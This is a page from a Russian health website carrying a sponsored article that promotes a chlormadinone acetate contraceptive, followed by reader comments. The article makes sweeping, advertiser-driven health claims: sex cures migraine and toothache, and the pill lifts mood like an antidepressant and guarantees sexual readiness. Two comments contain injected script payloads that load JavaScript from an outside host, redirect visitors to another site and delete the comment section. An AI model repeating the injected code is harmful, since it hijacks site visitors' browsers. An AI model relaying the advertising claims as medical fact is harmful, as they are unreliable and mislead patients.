Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Контрацептив сексу не пом...  >>  Контрацептив сексу не помеха
 
Обратная связь
 

Контрацептив сексу не помеха

Размер шрифта
30 сентября 2013 00:00
  • google_analytics: false
  • Нравится

Для каждой женщины важно быть сексуально активной. Сексологи считают, что  тем, кто занимается сексом реже 2 раз в неделю, нужно прописывать его как лекарство. Ведь согласно последним открытиям, занятия любовью лечат мигрень, зубную боль, снимают стресс, а также продлевают жизнь!

Контрацептив сексу не помеха

Женская сексуальность – это вопрос, о котором много говорят, но мало знают. Исследований, посвященных женской сексуальности, совсем немного. Сексологи сходятся на том, что женское либидо обладает очень сложной природой.

Основную роль в регуляции сексуальной активности у женщин, также как и у мужчин, играет тестостерон.

Снижение сексуального влечения у женщин может быть связано как с психологическими, так и с физиологическими проблемами, а также с приемом некоторых лекарственных препаратов. В некоторых случаях гормональные контрацептивы являются причиной снижения полового влечения у женщин. 

Однако не все контрацептивы снижают либидо.

Гормональный контрацептив, содержащий в своем составе этинилэстадиол и хлормадинона ацетат, не уменьшает сексуальную активность женщины.

И этому есть объяснение: хлормадинона ацетат подавляет активность тестостерона в коже, избавляя ее от прыщей, избыточного оволосения и сальности кожи. Женщина становится привлекательной и сексуальной. При этом хлормадинона ацетат не подавляет активность тестостерона в половых органах женщины и в тех участках головного мозга, которые отвечают за сексуальное возбуждение.

Либидо женщины очень сильно зависит от ее эмоционального состояния. Депрессия является самой частой причиной снижения женской сексуальной активности. Хлормадинона ацетат стимулирует синтез в головном мозге эндорфинов, которые обладают эффектом, подобным эффекту антидепрессантов. Прием контрацептива с хлормадинона ацетатом возвращает женщинам радость жизни и повышает их сексуальную активность.

Контрацептив с хлормадинона ацетатом обеспечивает хорошую контрацептивную надежность. Это снимает страх женщины перед нежелательной беременностью, позволяет расслабиться и отдаться любви.

Итак, принимая контрацептив с хлормадинона ацетатом, женщина:

  • Становится красивой и сексуальной.
  • Не боится забеременеть.
  • Всегда в хорошем настроении и готова к любви.
  • Ее тестостерон работает там, где нужно, обеспечивая высокую сексуальную активность.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

01 октября 2013 в 01:21

Цитировать   |   Пожаловаться

"Готова к любви"... Прикольно! Опять путаем Божий дар с яичницей?! 

2 - zzzzzz

30 июня 2015 в 19:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как быть здоровым ничего не делая   Чем ближе к ребенку спит папа, тем меньше тестостерона у него   Вся правда об экстренной контрацепции   Как получить незабываемый секс с научной точки зрения  
02 июля 2013Лечить головную боль можно без лекарств! Ученые подключают электричество к нервам! 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Как секс может улучшить жизнь
Еда для оргазма
Чем полезен секс?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.